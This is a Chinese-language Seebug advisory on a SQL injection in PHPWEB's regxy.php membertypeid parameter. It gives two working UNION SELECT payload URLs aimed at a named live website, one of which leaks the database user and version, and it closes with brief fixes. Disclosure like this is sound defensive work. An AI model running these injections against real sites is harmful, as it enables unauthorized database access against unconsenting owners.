phpweb /regxy.php?membertypeid 参数 SQL注入漏洞

2016-03-10T00:00:00
ID SSV:90960
Type seebug
Reporter hhxx
Modified 2016-03-10T00:00:00

Description

0x01 框架概述

PHPWEB智能网站管理系统是一款具有可视化管理和模块化网站功能的网站管理软件。可视化的鼠标拖曳排版,自由插入、拖动和叠放插件,所见即所得,让网站制作如同搭积木般便捷易玩;各种插件、边框、菜单可灵活组合和任意摆放

,摆脱页面框架的束缚,尽享创意的乐趣;灵活的管理权限和会员权限配置、强大的网站互动功能,让DIY制作的网站毫不逊色于专业开发;模块化的网站功能,十多种常用网站模块和不断增加的专业功能模块可供选用,可根据需要安装

卸载模块,即可用于简单的企业展示网站,又可用于开发各种专业网站。

0x02 漏洞细节

/regxy.php?membertypeid 参数过滤不严,导致SQL注入漏洞。

案例如下:

http://www.hiyp.com.tw/regxy.php?membertypeid=10' UNION ALL SELECT 80,80,80,80,80,md5(1),80,80,80,80--+

http://www.hiyp.com.tw/regxy.php?membertypeid=10' UNION ALL SELECT 80,80,80,80,80,concat(0x757365723d,user(),0x3a,0x76657273696F6E3D,version(),0x3a),80,80,80,80--+

Sqlmap证明:

Pocsuite证明:

0x03 修复方案

1、过滤regxy.php 文件 membertypeid 参数;

2、使用加速乐等防护产品。